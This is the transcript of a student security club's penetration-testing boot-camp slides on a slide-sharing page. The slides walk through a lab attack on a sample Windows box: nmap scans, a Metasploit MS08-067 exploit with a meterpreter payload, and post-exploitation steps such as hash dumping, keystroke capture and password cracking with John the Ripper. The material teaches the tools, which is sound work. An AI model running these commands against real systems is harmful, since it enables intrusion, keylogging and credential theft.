Penetration Testing 101 (Boot-camp)

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

By Bruce Ellis Western Governors University. Demonstrate the need for updating information systems Build security awareness Inform management of the risk.
Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Armitage and Metasploit Penetration Testing Lab
Computer Security Fundamentals
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
© 2010 – MAD Security, LLC All rights reserved ArmitageArmitage A Power User’s Interface for Metasploit.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
CSCI 530L Vulnerability Assessment. Process of identifying vulnerabilities that exist in a computer system Has many similarities to risk assessment Four.
Information Networking Security and Assurance Lab National Chung Cheng University 1 A Real World Attack: wu-ftp.
Computer Security and Penetration Testing
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 6 Enumeration.
Microsoft Baseline Security Analyzer INLS 187 Security Software Presentation by Hinár György Polczer
1 GFI LANguard Network Security Scanner. 2 Contents Introduction Features Source & Installation Testing environment Results Conclusion.
Penetration Testing.
Penetration Testing Edmund Whitehead Rayce West. Introduction - Definition of Penetration Testing - Who needs Penetration Testing? - Penetration Testing.
Adrian Crenshaw.  I run Irongeek.com  I have an interest in InfoSec education  I don’t know everything - I’m.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Port Knocking Software Project Presentation Paper Study – Part 1 Group member: Liew Jiun Hau ( ) Lee Shirly ( ) Ong Ivy ( )
4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.
Ana Chanaba Robert Huylo
1 Reconnaissance, Network Mapping, and Vulnerability Assessment ECE4112 – Internetwork Security Georgia Institute of Technology.
Karlstad University Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
The Microsoft Baseline Security Analyzer A practical look….
Computer Security and Penetration Testing Chapter 16 Windows Vulnerabilities.
Penetration Testing Training Day Penetration Testing Tools and Techniques – pt 1 Mike Westmacott, IRM plc Supported by.
© 1999 Ernst & Young LLP e e treme hacking Black Hat 1999 Over the Router, Through the Firewall, to Grandma’s House We Go George Kurtz & Eric Schultze.
Hands on with BackTrack Information gathering, scanning, simple exploits By Edison Carrick.
System Hacking Active System Intrusion. Aspects of System Hacking System password guessing Password cracking Key loggers Eavesdropping Sniffers Man in.
SCSC 555 Frank Li.  Introduction to Enumeration  Enumerate Microsoft OS  Enumerate *NIX OS  Enumerate NetWare OS (skip) 2.
Trinity Uses Nmap, shouldn’t you?. From “The Art of War” "... knowing your enemy 100% of the time, you will win your battle 100% of the time, knowing.
1 Security Penetration Testing Angela Davis Mrinmoy Ghosh ECE4112 – Internetwork Security Georgia Institute of Technology.
Module 14: Securing Windows Server Overview Introduction to Securing Servers Implementing Core Server Security Hardening Servers Microsoft Baseline.
TCOM Information Assurance Management System Hacking.
Retina Network Security Scanner
CNIT 124: Advanced Ethical Hacking Ch 13: Post Exploitation Part 2.
MIS Week 1 Site:
11 UPGRADING AND MIGRATING TO WINDOWS SERVER 2003 Chapter 12.
Module 7: Designing Security for Accounts and Services.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
Kali Linux BY BLAZE STERLING. Roadmap  What is Kali Linux  Installing Kali Linux  Included Tools  In depth included tools  Conclusion.
Penetration Testing By Blaze Sterling. Roadmap What is Penetration Testing How is it done? Penetration Testing Tools Kali Linux In depth included tools.
PostExploitation CIS 5930/4930 Offensive Computer Security Spring 2014.
Hacking 101, Boot-camp Computer Security Group March 10, 2010 Mitchell Adair.
Introduction to Vulnerability Assessment Labs Ge Zhang Dvg-C03.
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Mitchell Adair Computer Security Group Feb. 10th, 2010 Enumerating Windows Users.
Microsoft OS Vulnerabilities April 1, 2010 MIS 4600 – MBA © Abdou Illia.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Hacking Windows.
Penetration Testing Scanning
Computer Security Fundamentals
Enumeration.
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Penetration Testing 10/12/2018 Penetration Testing.
Penetration Testing 10/12/2018 Penetration Testing.
Backtrack Metasploit and SET
Metasploit Assignment
Web Application Penetration Testing ‘17
Metasploit Analysis Report Overview
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Penetration Testing & Network Defense
Presentation transcript:

Penetration Testing 101 (Boot-camp) Computer Security Group Mitchell Adair utdcsg.org

Outline “Interactive” meeting Introduction to Backtrack A mini penetration test Scenario Methodology Enumeration, Exploitation, Post Exploitation Exercise Summary Resources

Scenario Company X wants you to test if their internal hosts are secure. They have given you a sample box with the default security settings the company uses for all user workstations. You take it back to the lab and begin to test it...

Outline Enumeration Exploitation Post Exploitation OS, services, versions, filters Exploitation Match a service + version to a known vulnerability Exploit, getting shell access to the box Post Exploitation Shell is just the beginning... ;) Hashes, SSH / GPG keys, pivot, …

Enumeration 'Nmap ("Network Mapper") is a free and open source utility for network exploration or security auditing.' - nmap.org nmap [Scan Type(s)] [Options] {target specification} Scan Types -sS, Syn -sT, Connect -sA, Ack … Options -O, OS -sV, services -v, verbose …

… Enumeration nmap 192.168.1.1 nmap -v -sV -O 192.168.1.1 -p 1-65535 Default scan, full SYN, top 1000 ports nmap -v -sV -O 192.168.1.1 -p 1-65535 Verbose, services, OS, ports 1 through 65535 nmap -PN --script=smb* -sV -O 192.168.1.1 Don't ping, run all smb* scripts, service, OS

Nmap Output Not shown: 996 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds 1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe) ... OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1, Microsoft Windows XP SP1 Host script results: | smb-os-discovery: Windows 2000 | smb-enum-domains: | Domain: MITCHELL-32D5C5 | |_ SID: S-1-5-21-606747145-1647877149-725345543 | |_ Users: add, Administrator, Guest, s3cr3tus3r, sally | Anonymous shares: IPC$ |_ Restricted shares: ADMIN$, C$ | smb-check-vulns: |_ MS08-067: VULNERABLE

Exploitation Metasploit – Penetration Testing Framework tools, libraries, modules, and user interfaces # msfconsole msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set RHOST 192.168.1.1 set PAYLOAD windows/meterpreter/bind_tcp exploit

Post Exploitation Gather useful information Pivot SSH & GPG keys, hashes, etc... Meterpreter “post” modules Pivot meterpreter > hashdump sysinfo keyscan_(start | stop | dump) download migrate shell

… Post Exploitation We dumped the hashes... now what? John the Ripper Pass the hash Crack the hash John the Ripper a tool to find weak passwords of your users John [options] password-files --wordlist --users, --groups --session, --restore

… Post Exploitation John --wordlist=/.../password.lst /tmp/hashes.txt Loaded 6 password hashes with no different salts (NT LM DES [64/64 BS MMX]) ABC123 (sally) SECRET (s3cr3tus3r) (Guest) BASKETB (webmaster:1) ALL (webmaster:2) ADMIN1 (Administrator) guesses: 5 time: 0:00:00:00 100% c/s: 25730 trying: SKIDOO - ZHONGGU

So... let's get started Boot up to your Backtrack CD passwd /etc/init.d/networking start startx Follow along... let's pwn this box :)

Summary Clearly... Company X's default user workstations needs some work. Now let's do the paperwork!... just kidding ;) Hopefully this gives everyone a hands on introduction to Backtrack, some essential tools, and the attacker's mindset & process. Feedback is always appreciated!

Resources utdcsg.org Nmap - nmap.org/5/ Metasploit - metasploit.com/ Presentations, articles, resources, etc. IRC - irc.oftc.net, #utdcsg Nmap - nmap.org/5/ Metasploit - metasploit.com/ John the Ripper - openwall.com/john/

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.